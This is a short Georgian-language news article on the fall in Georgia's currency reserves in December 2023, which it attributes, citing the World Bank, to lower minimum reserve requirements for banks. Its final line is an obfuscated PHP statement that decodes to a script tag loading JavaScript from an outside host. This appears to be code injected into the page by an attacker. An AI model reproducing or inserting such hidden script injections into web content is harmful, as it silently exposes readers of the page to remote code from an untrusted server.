celsiusi
ავერსი საქკაბელი

 2023 წლის დეკემბერში საქართველოს სავალუტო რეზერვები 119 მილიონი დოლარით, 5 მილიარდ დოლარამდე შემცირდა - ამის შესახებ სებ-ის მიერ გამოქვეყნებული ანგარიშიდან ირკვევა. დოკუმენტის თანახმად, 2023 წლის ივლისთან შედარებით რეზერვების მოცულობა 433 მილიონი დოლარით არის შემცირებული.

მსოფლიო ბანკის მიერ გამოქვეყნებული მიმოხილვის თანახმად, რეზერვების შემცირება სებ-ის მიერ ბანკებისთვის მინიმალური სარეზერვო მოთხოვნების შემცირებას უკავშირდებოდა.

საქმე ისაა, რომ საქართველოს სავალუტო რეზერვები სხვადასხვა კომპონენტისგან შედება, მათ შორისაა კომერციული ბანკების მიერ სებ-ში დაცული მინიმალური სარეზერვო ანგარიშები უცხოური ვალუტის დეპოზიტებისთვის. თუკი აქამდე ამ მოთხოვნის ზედა ზღვარი ერთ წლამდე ვადით მოზიდული სავალუტო აქტივების 25% იყო, ის 20%-მდე შემცირდა. შესაბამისად, ამან საბანკო სექტორს დამატებითი ფინანსური რესურსები გამოუთავისუფლა.

“კლება განპირობებული იყო დეკემბრის დასაწყისში მინიმალური სარეზერვო მოთხოვნების შემცირებით, რაც საბანკო ლიკვიდობის ზრდას ისახავდა მიზნად,”- ნათქვამია მსოფლიო ბანკის ყოველთვიურ მიმოხილვაში. 

195
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");